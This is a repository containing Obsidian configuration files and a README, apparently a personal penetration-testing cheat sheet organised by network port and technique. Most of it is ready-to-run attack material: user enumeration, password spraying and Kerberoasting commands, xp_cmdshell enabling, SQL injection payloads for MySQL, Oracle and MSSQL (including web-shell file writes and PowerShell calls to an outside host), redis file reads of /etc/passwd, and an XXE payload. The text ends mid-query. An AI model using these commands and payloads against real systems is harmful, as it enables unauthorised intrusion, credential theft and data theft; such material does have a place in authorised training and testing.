├── .obsidian ├── hotkeys.json ├── appearance.json ├── app.json ├── core-plugins.json ├── graph.json └── workspace └── README.md /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | {} -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "baseFontSize": 17, 3 | "theme": "obsidian" 4 | } -------------------------------------------------------------------------------- /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "autoConvertHtml": false, 3 | "spellcheck": false, 4 | "readableLineLength": true, 5 | "legacyEditor": false, 6 | "livePreview": true 7 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "page-preview", 8 | "note-composer", 9 | "command-palette", 10 | "markdown-importer", 11 | "word-count", 12 | "open-with-default-app", 13 | "file-recovery" 14 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | "showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 1, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "617aac7387f32d16", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "97256d3993fdce5f", 8 | "type": "leaf", 9 | "state": { 10 | "type": "markdown", 11 | "state": { 12 | "file": "README.md", 13 | "mode": "preview", 14 | "source": true 15 | } 16 | } 17 | }, 18 | { 19 | "id": "96a13b43f91ad7b5", 20 | "type": "leaf", 21 | "state": { 22 | "type": "markdown", 23 | "state": { 24 | "file": "README.md", 25 | "mode": "source", 26 | "source": true 27 | } 28 | } 29 | } 30 | ], 31 | "direction": "vertical" 32 | }, 33 | "left": { 34 | "id": "e73fa262a9cb682f", 35 | "type": "split", 36 | "children": [ 37 | { 38 | "id": "a6372e08144ad9ec", 39 | "type": "tabs", 40 | "children": [ 41 | { 42 | "id": "81b75c4dbf8d2c16", 43 | "type": "leaf", 44 | "state": { 45 | "type": "file-explorer", 46 | "state": {} 47 | } 48 | }, 49 | { 50 | "id": "79afb801805f0663", 51 | "type": "leaf", 52 | "state": { 53 | "type": "search", 54 | "state": { 55 | "query": "", 56 | "matchingCase": false, 57 | "explainSearch": false, 58 | "collapseAll": false, 59 | "extraContext": false, 60 | "sortOrder": "alphabetical" 61 | } 62 | } 63 | } 64 | ] 65 | } 66 | ], 67 | "direction": "horizontal", 68 | "width": 100 69 | }, 70 | "right": { 71 | "id": "0278797736506062", 72 | "type": "split", 73 | "children": [ 74 | { 75 | "id": "c5678486e4db8946", 76 | "type": "tabs", 77 | "children": [ 78 | { 79 | "id": "16a05e20564b624a", 80 | "type": "leaf", 81 | "state": { 82 | "type": "backlink", 83 | "state": { 84 | "file": "README.md", 85 | "collapseAll": false, 86 | "extraContext": false, 87 | "sortOrder": "alphabetical", 88 | "showSearch": false, 89 | "searchQuery": "", 90 | "backlinkCollapsed": false, 91 | "unlinkedCollapsed": true 92 | } 93 | } 94 | } 95 | ] 96 | } 97 | ], 98 | "direction": "horizontal", 99 | "width": 300, 100 | "collapsed": true 101 | }, 102 | "active": "96a13b43f91ad7b5", 103 | "lastOpenFiles": [ 104 | "README.md" 105 | ] 106 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | z# EzpzCheatSheet 2 | This CheatSheet will not have much explanation. It just a commands that has been used pwning all of the machines from various platform and something that I have encounter before. Also any notes, CTF and others that help me. 3 | 4 | Also, do check this notes here [https://github.com/aniqfakhrul/archives](https://github.com/aniqfakhrul/archives) ! 5 | 6 | # A. Ports 7 | 8 | ### Port 21 (FTP) 9 | 10 | ```bash 11 | => Commands 12 | $ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.10 13 | $ ftp 10.10.10.10 5581 14 | ``` 15 | 16 | ### Port 22 (SSH) 17 | 18 | ```bash 19 | => Install 20 | $ sudo apt install openssh-server 21 | 22 | => Commands 23 | $ ssh root@10.10.10.10 24 | $ ssh root@10.10.10.10 -i id_rsa 25 | 26 | => Nmap 27 | 28 | 29 | => Service 30 | $ sudo systemctl status ssh 31 | $ sudo systemctl enable ssh 32 | $ sudo systemctl start ssh 33 | 34 | => References 35 | $ https://www.cyberciti.biz/faq/ubuntu-linux-install-openssh-server/ 36 | ``` 37 | 38 | ### Port 25 (SMTP) 39 | 40 | ```bash 41 | => Nmap 42 | $ 43 | 44 | => Enum Users 45 | $ smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.10.10.10 46 | 47 | => Swaks (Send Email) 48 | $ swaks --to nik@bank.local --from aniq@bank.local --header "Subject: Welcome" --body "Enjoy your stay!" --server 10.10.10.10 49 | ``` 50 | 51 | ### Port 53 (DNS) 52 | 53 | ```bash 54 | => Install 55 | $ sudo apt install dnsutils 56 | 57 | => Nmap 58 | $ nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 10.10.10.10 59 | 60 | => Nslookup 61 | $ nslookup 10.10.10.10 62 | * server 10.10.10.10 63 | * 10.10.10.10 64 | 65 | => Dig 66 | $ dig bank.local axfr @10.10.10.10 67 | 68 | => Host 69 | $ host -t ns megacorpone.com 70 | ``` 71 | 72 | ### Port 80 (Http) 73 | 74 | ```bash 75 | => Install Apache2 76 | $ sudo apt install apache2 77 | 78 | => Service 79 | $ sudo systemctl status apache2 80 | $ sudo systemctl enable apache2 81 | $ sudo systemctl start apache2 82 | 83 | => References 84 | $ https://www.digitalocean.com/community/tutorials/how-to-install-the-apache-web-server-on-ubuntu-20-04 85 | ``` 86 | 87 | ### Port 88 (Kerberos) 88 | 89 | ```bash 90 | => Nmap 91 | 92 | 93 | => Enumerate Users 94 | $ kerbrute userenum -d bank.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt 95 | 96 | => Bruteforce User 97 | $ kerbrute bruteuser -d bank.local --dc 10.10.10.10 rockyou.txt nik 98 | 99 | => Passwword Spray 100 | $ kerbrute passwordspray -d bank.local --dc 10.10.10.10 user.txt 'Password@123!' 101 | 102 | => Kerberoasting 103 | $ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt 104 | $ 13100 hashcat mode 105 | 106 | => bloodhound-python 107 | $ bloodhound-python -u 'nik' -p 'Password@123!' -d 'bank.local' -ns 10.10.10.10 108 | $ bloodhound-python -u 'nik' --hashes 'aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d' -d 'bank.local' -ns 10.10.10.10 109 | ``` 110 | 111 | ### Port 110 , 995 (POP3) 112 | 113 | ```bash 114 | => Nmap 115 | 116 | => Banner Grabbing 117 | $ nc -nv 10.10.10.10 110 118 | $ openssl s_client -connect 10.10.10.10:995 -crlf -quiet 119 | 120 | => Connect 121 | $ telnet 10.10.10.10 110 122 | * USER nik 123 | * PASS Password@123! 124 | * list 125 | * retr 1 126 | * quit 127 | ``` 128 | 129 | ### Port 135 , 593 (RPC) 130 | 131 | ```bash 132 | => Nmap 133 | 134 | => Rpcclient 135 | $ rpcclient -U '' -N 10.10.10.10 136 | 137 | => Rpcclient Commands 138 | $ enumdomusers 139 | $ netshareenum 140 | $ netshareenumall 141 | $ srvinfo 142 | $ queryuser 500 143 | $ querydispinfo 144 | $ enumdomains 145 | $ enumprivs 146 | 147 | ``` 148 | 149 | ### Port 139,445 (SMB) 150 | 151 | ```bash 152 | => Install 153 | $ sudo apt install samba 154 | 155 | => Service 156 | $ sudo systemctl status smbd 157 | $ sudo systemctl start smbd 158 | $ sudo systemctl stop smbd 159 | 160 | => Configuration file 161 | $ /etc/samba/smb.conf 162 | $ sudo smbpasswd -a username 163 | 164 | => Nmap 165 | $ nmap --script "safe or smb-enum-*" -p 445 10.10.10.10 166 | $ nmap --script smb-vuln* -p 137,139,445 10.10.10.10 167 | 168 | => Smbmap 169 | $ smbmap -H 10.10.10.10 170 | $ smbmap -H 10.10.10.10 -u raj -p 123 171 | $ smbmap -H 10.10.10.10 -P 139 172 | 173 | => Smbclient 174 | $ smbclient -L 10.10.10.10 175 | $ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;mget *" 176 | $ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;ls" 177 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;mget *" 'Password@123!' 178 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;ls" 'Password@123!' 179 | $ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "get \Windows\test.txt" 'Password@123!' -t 10000 180 | 181 | => Smbget 182 | $ smbget -R smb://10.10.10.10/users$/nik/nik.xml -U 'nik' 183 | 184 | => Crackmapexec 185 | $ crackmapexec smb --gen-relay-list targets.txt 10.10.10.0/24 186 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -X whoami --amsi-bypass /tmp/amsiibypass 187 | $ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -x whoami 188 | $ crackmapexec smb 10.10.10.10 -u 'nik' -H hash_uniq.txt 189 | 190 | => Enum4linux 191 | $ enum4linux 10.10.10.10 192 | $ enum4linux -u "user" -p "password" -a 10.10.10.10 193 | $ for i in $(cat list.txt); do enum4linux -a $i;done 194 | 195 | 196 | => References 197 | $ https://ubuntu.com/tutorials/install-and-configure-samba 198 | ``` 199 | 200 | ### 143,993 (IMAP) 201 | 202 | ```bash 203 | => Nmap 204 | $ nmap -sV --script imap-brute -p 143 10.10.10.10 205 | ``` 206 | 207 | ### Port 161, 162 (SNMP - UDP) 208 | 209 | ```bash 210 | => Install 211 | $ pip install snmpclitools 212 | $ sudo apt-get install snmp-mibs-downloader 213 | 214 | => Snmp-check 215 | $ snmp-check 10.10.10.10 -c public 216 | 217 | => Snmpwalk 218 | $ snmpwalk -v1 -c public 10.10.10.10 219 | $ snmpwalk -c public 10.10.10.10 220 | $ snmpwalk -v1 -c public 10.10.10.10 1 221 | $ snmpwalk -v1 -c public 10.10.10.10 2 222 | $ snmpwalk -v 1 -c public 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendOutputFull 223 | $ snmpwalk -m +MY-MIB -v 2c -c public 10.10.10.10 nsExtendObjects 224 | $ snmpwalk -m +MY-MIB -v 1 -c public 10.10.10.10 nsExtendObjects 225 | $ snmpwalk -m ALL -v 2c -c public 10.10.10.10 nsExtendObjects 226 | 227 | => Onesixtyone 228 | $ onesixtyone -c /path/to/seclists/Discovery/SNMP/snmp-onesixtyone.txt -i ip.txt 229 | ``` 230 | 231 | ### Port 623 (IPMI - UDP) 232 | 233 | ```bash 234 | => Nmap 235 | $ nmap -n-sU -p 623 10.10.10.10 236 | 237 | => Metasploit 238 | $ use auxiliary/scanner/ipmi/ipmi_cipher_zero 239 | $ use auxiliary/scanner/ipmi/ipmi_version 240 | 241 | => Authentication Bypass Cipher 0 242 | $ ipmitool -I lanplus -C 0 -H 10.10.10.10 -U Username -P Password user list 243 | 244 | => Default Credentials 245 | Administrator:<8 character string> 246 | admin:admin 247 | root:calvin 248 | root:changeme 249 | ADMIN:ADMIN 250 | 251 | => References 252 | $ https://book.hacktricks.xyz/pentesting/623-udp-ipmi 253 | $ https://www.tzulo.com/crm/knowledgebase/47/IPMI-and-IPMITOOL-Cheat-sheet.html 254 | ``` 255 | 256 | ### Port 636 (LDAP) 257 | 258 | ```bash 259 | => Nmap 260 | $ nmap -n -sV --script "ldap* and not brute" 10.10.10.10 261 | 262 | => LdapSearch 263 | $ ldapsearch -h 10.10.10.10 -x -b 'DC=bank,DC=local' -s sub 264 | $ ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)' 265 | $ ldapsearch -x -h 10.10.10.10 -D 'BANK\nik' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local' 266 | $ ldapsearch -x -h 10.10.10.10 -D 'nik@bank.local' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local' 267 | $ ldapsearch -x -h 10.10.10.10 -D 'nik@bank.local' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local' | grep -i -C 40 268 | $ ldapsearch -x -h 10.10.10.10 -D 'nik@bank.local' -w 'Password@123!' -b 'DC=bank,DC=local' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" samaccountname 269 | 270 | => Ldap Queries 271 | => find domain computers not dc 272 | $ ([adsisearcher]"(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))").findall() 273 | 274 | => find domain controllers 275 | $ ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").findall() 276 | 277 | => find all domain users 278 | $ ([adsisearcher]"(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findall() 279 | 280 | => Get samaccountname 281 | $ ([adsisearcher]"(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findall().Properties.samaccountname 282 | 283 | ``` 284 | 285 | ### 873 (Rsync) 286 | 287 | ```bash 288 | => Nmap 289 | $ nmap -sV --script "rsync-list-modules" -p 873 10.10.10.10 290 | 291 | => Command 292 | $ rsync -av --list-only rsync://10.10.10.10/Modules 293 | $ rsync -av rsync://10.10.10.101/Conf ./shared 294 | $ rsync -av ./test.txt rsync://10.10.10.10/Modules/test.txt 295 | 296 | => References 297 | $ https://book.hacktricks.xyz/pentesting/873-pentesting-rsync 298 | ``` 299 | 300 | ### 1433 (MSSQL) 301 | 302 | ```code 303 | => Commands 304 | $ SELECT @@version 305 | $ SELECT DB_NAME() 306 | $ SELECT name FROM master..sysdatabases; 307 | 308 | => Enable xp_cmdshell 309 | $ sp_configure 'show advanced options', '1' 310 | $ RECONFIGURE 311 | $ sp_configure 'xp_cmdshell', '1' 312 | $ RECONFIGURE 313 | $ EXEC master..xp_cmdshell 'whoami' 314 | 315 | => Convert 316 | $ select convert(varchar(100),0X54455354); 317 | 318 | => sqsh 319 | $ sqsh -U sa -P password -S 10.10.10.10 320 | * EXEC master..xp_cmdshell 'whoami' 321 | * go 322 | 323 | => Playground 324 | $ https://sqliteonline.com/ 325 | 326 | => References 327 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md 328 | ``` 329 | 330 | ### 2049 (NFS MOUNT) 331 | 332 | ```bash 333 | => Nmap 334 | $ nmap -sV --script=nfs-showmount 335 | 336 | => Showmount 337 | $ showmount -e 10.10.10.10 338 | 339 | => Mount 340 | $ mount -t nfs 10.10.10.10:/home mnt 341 | $ mount -o vers=3 -t nfs 10.10.10.10:/home mnt 342 | ``` 343 | 344 | ### 3128 (SQUID PROXY) 345 | 346 | ```bash 347 | => Ffuf 348 | $ ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -x http://10.10.10.10:3128 349 | 350 | => proxychains 351 | $ echo "http 10.10.10.10 3128" >> /etc/proxychains.conf 352 | * proxychains ssh john@10.10.10.10 353 | ``` 354 | 355 | ### 3306 (MYSQL) 356 | 357 | ```bash 358 | => Commands 359 | $ mysql -u root -p -h 10.10.10.10 360 | $ mysql -u root -pPassword123 -e "use drupal;select * from users" 361 | 362 | => Bruteforce 363 | $ hydra -l nik -p password.txt 10.10.10.10 mysql -t 30 -f 364 | 365 | => Check UDF 366 | $ select * from msql.func; 367 | 368 | => Mysql Commands 369 | $ select sys_exec('whoami'); 370 | ``` 371 | 372 | ### 3389 (RDP) 373 | 374 | ```bash 375 | => Nmap 376 | $ nmap -p 3389 --script=rdp-vuln-* 10.10.10.10 377 | 378 | => Commands 379 | $ xfreerdp /u:nik /p:'Password@123!' /cert:ignore /v:10.10.10.10 380 | $ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.10.10 /drive:share_mount,/opt/folder_to_mount 381 | $ rdesktop -a 16 -z -u admin -p password 10.10.10.10 382 | $ rdesktop -f -u "" 10.10.10.10 383 | 384 | => References 385 | $ https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ 386 | ``` 387 | 388 | ### 3632 (DISTCC) 389 | 390 | ```bash 391 | => Nmap 392 | $ nmap -p 3632 10.10.10.10 --script distcc-exec --script-args="distcc-exec.cmd='id'" 393 | 394 | ``` 395 | 396 | ### Port 6379 (REDIS) 397 | 398 | ```bash 399 | => Install 400 | $ sudo apt-get install redis-tools 401 | 402 | => Commands 403 | $ redis-cli -h 10.10.10.10 404 | * keys * 405 | * get pk:ids:User 406 | * info 407 | * client list 408 | * CONFIG GET * 409 | $ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('//10.10.11.1//share')" 0 410 | $ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('/etc/passwd')" 0 411 | 412 | => redis-dump-go 413 | $ https://github-com.translate.goog/yannh/redis-dump-go 414 | 415 | => Downloads 416 | $ https://download.redis.io/releases/ 417 | 418 | => References 419 | $ https://book.hacktricks.xyz/pentesting/6379-pentesting-redis 420 | ``` 421 | 422 | ### Port 8086 (InfluxDB) 423 | 424 | ```bash 425 | => User Enumeration 426 | $ http://127.0.0.1:8086/debug/requests 427 | 428 | => Usage 429 | $ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "q=show databases" 430 | $ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "db=database" --data-urlencode "q=select * from \"tables\"" 431 | $ curl -G "http://10.10.133.227:8086/query?pretty=true" -H "Authorization: Bearer " --data-urlencode "db=database" --data-urlencode "q=select * from times" --data-urlencode "epoch=s" 432 | 433 | => Commands 434 | $ show databases 435 | $ show measurements 436 | $ show users 437 | $ select * from tables 438 | 439 | => References 440 | $ https://www.komodosec.com/post/when-all-else-fails-find-a-0-day 441 | $ https://docs.influxdata.com/influxdb/v1.8/administration/authentication_and_authorization/ 442 | ``` 443 | 444 | ### 27017,27018 (MONGODB) 445 | 446 | ```bash 447 | => Commands 448 | $ mongo localhost:27017/myplace -u nik -p Password123 449 | * show dbs 450 | * use 451 | * show collections 452 | * db..find() 453 | * db..insert( { _id: 1, cmd: "curl 10.10.14.4/test"} ) 454 | ``` 455 | 456 | # B. Tools/Techniques 457 | 458 | ### Nali 459 | 460 | ```bash 461 | # Download/Install 462 | https://github.com/zu1k/nali 463 | go get -u -v github.com/zu1k/nali 464 | 465 | # Usage 466 | echo 6.6.6.6 | nali 467 | nali 1.2.3.4 468 | nali 1.2.3.4 4.3.2.1 123.23.3.0 469 | nslookup nali.lgf.im 8.8.8.8 | nali 470 | nslookup google.com | nali 471 | 472 | ``` 473 | 474 | ### Port Knocking 475 | ```bash 476 | => Commands 477 | $ knocker.py -p 8890,7000,666 10.10.10.10 478 | $ for i in 571 290 911;do nmap -n -v0 -Pn --max-retries 0 -p $i 10.10.10.10;done 479 | $ knock 10.10.10.10 7000:666:8890 480 | 481 | => Permutation (Port) 482 | $ python -c 'import itertools; print list(itertools.permutations(\[8890,7000,666\]))' | sed 's/), /\\n/g' | tr -cd '0-9,\\n' | sort | uniq > permutation.txt 483 | 484 | ``` 485 | 486 | ### Port Scanning 487 | 488 | ```bash 489 | # No netstat or lsof 490 | $ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done 491 | $ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done | sort | uniq 492 | $ https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof 493 | 494 | # Another Port Scanning 495 | $ for i in {1..65535};do (echo < /dev/tcp/127.0.0.1/$i) &>/dev/null && printf "\n[+] Open Port at\n: \t%d\n" "$i" || printf "."; done 496 | ``` 497 | 498 | ### Curl Commands 499 | 500 | ```bash 501 | # Commands 502 | $ curl -XGET -G -b 'PHPSESSID=cnc4ofdvpm1770nodu7lcbte46' 'http://localhost/tracks.php' --data-urlencode "id=9999 union select 1,database(),3-- -" 503 | ``` 504 | 505 | ### Shodan 506 | 507 | ```bash 508 | # Install 509 | easy_install shodan 510 | 511 | # Commands 512 | shodan init " Get Current Database 523 | $ database() 524 | 525 | => Get Database 526 | $ UNION SELECT table_schema FROM information_schema.tables 527 | 528 | => Get Table Name 529 | $ UNION SELECT table_name FROM information_schema.tables WHERE table_schema == "database" 530 | 531 | => Get Column Name 532 | $ UNION SELECT table_name, column_name FROM information_schema.columns 533 | 534 | => ===Time Based=== 535 | => Get Database 536 | $ (SELECT sleep(5) from dual where substring(database(),1,1)='h') 537 | $ (SELECT sleep(5) from dual where substring(database(),2,1)='h') 538 | 539 | => Get Tables 540 | $ (SELECT sleep(5) from information_schema.tables where table_name LIKE '%hotel%') 541 | 542 | => Get Columns 543 | $ (SELECT sleep(5) from information_schema.columns where column_name LIKE '%room%' AND table_name='hotel') 544 | 545 | => Extract 546 | $ IF((select MID(user,1,1) from mysql.user limit 0,1)='D' , sleep(5),0) 547 | 548 | => Extra 549 | $ (select IF(500>1000, "nothing", sleep(5))) 550 | 551 | => ===Union Based=== 552 | => Get Database 553 | $ 9999 union select 1,database(),3,4,5 554 | 555 | => Get Tables 556 | $ 9999 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema like "%hotel%" 557 | 558 | => Get Columns 559 | $ 9999 union select 1, group_concat(column_name),3,4,5 from information_schema.columns where table_name like "%room%" 560 | 561 | => Extract 562 | $ 9999 union select 1,group_concat(user,":",password),3,4,5 from mysql.user 563 | 564 | => ===Blind=== 565 | [WHERE] 566 | $ ' and password like 'k%'-- 567 | 568 | => Write File 569 | $ Set Global General_Log_File = '/tmp/test.php'; 570 | $ Select ''; 571 | $ select '' into outfile 'C:/xampp/htdocs/shell4.php' 572 | 573 | => Read File 574 | $ load_file("/etc/passwd"); 575 | 576 | [ORACLE] 577 | => Get Current Database 578 | $ union SELECT SYS.DATABASE_NAME,'b',1 FROM v$version-- 579 | 580 | => Get All Tables 581 | $ ' union SELECT table_name,'b',1 FROM all_tables-- 582 | 583 | => Get Columns 584 | $ ' union SELECT column_name,'b',1 FROM all_tab_columns WHERE table_name = 'TABLE'-- 585 | 586 | => Extract 587 | $ ' union SELECT USERNAME,'b',1 FROM TABLE-- 588 | $ ' union SELECT USERNAME||':'||PASSWORD,'',1 FROM TABLE-- 589 | 590 | [MSSQL] 591 | => Payload (Encounter Before) 592 | $ A';waitfor delay '0:0:00';-- 593 | $ ' OR 1=1 OR 'A' LIKE 'A 594 | $ ';EXEC master..xp_cmdshell 'powershell.exe -c curl http://10.10.10.10/';-- 595 | $ ';EXEC master..xp_cmdshell 'powershell.exe -c iwr http://10.10.10.10/';-- 596 | 597 | => Check File exist or Not 598 | => Corect Path 599 | $ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 600 | 601 | => Wrong Path 602 | $ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win2.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 603 | 604 | => Check Directory/Files Exist Or Not 605 | => Correct 606 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 607 | 608 | => Wrong 609 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows2\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 610 | 611 | => Check Hostname 612 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((hostname)[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 613 | 614 | => Check APPDATA Path 615 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(($env:APPDATA[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 616 | 617 | => Check Substring 618 | => Correct 619 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 620 | 621 | => Wrong 622 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]66)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 623 | 624 | => Powershell IF ELSE 625 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ("1" -eq "1") {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 626 | 627 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (1 -eq 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 628 | 629 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (echo 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 630 | 631 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ( Test-Path C:\ ) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 632 | 633 | $ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(Get-ChildItem -Path C:\){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 634 | 635 | 636 | => Simple IF ELSE 637 | $ ';DECLARE @value INT = 1;IF(@value=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 638 | 639 | => Payload (Enable xp_cmdshell) 640 | $ ';sp_configure 'show advanced options', '1';RECONFIGURE;-- 641 | $ ';sp_configure 'xp_cmdshell', '1';RECONFIGURE;-- 642 | 643 | => Time Based 644 | $ ;waitfor delay '0:0:10'-- 645 | $ );waitfor delay '0:0:10'-- 646 | $ ';waitfor delay '0:0:10'-- 647 | $ ');waitfor delay '0:0:10'-- 648 | $ ));waitfor delay '0:0:10'-- 649 | 650 | => References 651 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md 652 | $ https://www.sqlservercentral.com/forums/topic/determining-whether-a-directory-exists-xp_dirtree-xp_subdirs 653 | 654 | [SQLITE] 655 | => Command 656 | $ sqlite3 databse.db 657 | $ .tables 658 | $ select * from user; 659 | $ .schema user 660 | $ UPDATE user SET passwd = "" where id 2; 661 | ``` 662 | 663 | ### XXE Injection 664 | 665 | ``` 666 | => Payload (1) 667 | 668 | ]> 669 | 670 | &xxe; 671 | John 672 | 673 | 674 | => Payload (2) 675 | # send this on the application 676 | 677 | 679 | %ext; 680 | ]> 681 | 682 | 683 | # content of poc.dtd 684 | 685 | "> 686 | %eval; 687 | %error; 688 | 689 | => References 690 | $ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md 691 | ``` 692 | 693 | ### GraphQL Injection 694 | 695 | ```bash 696 | # Introspection 697 | {"query":"{\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n 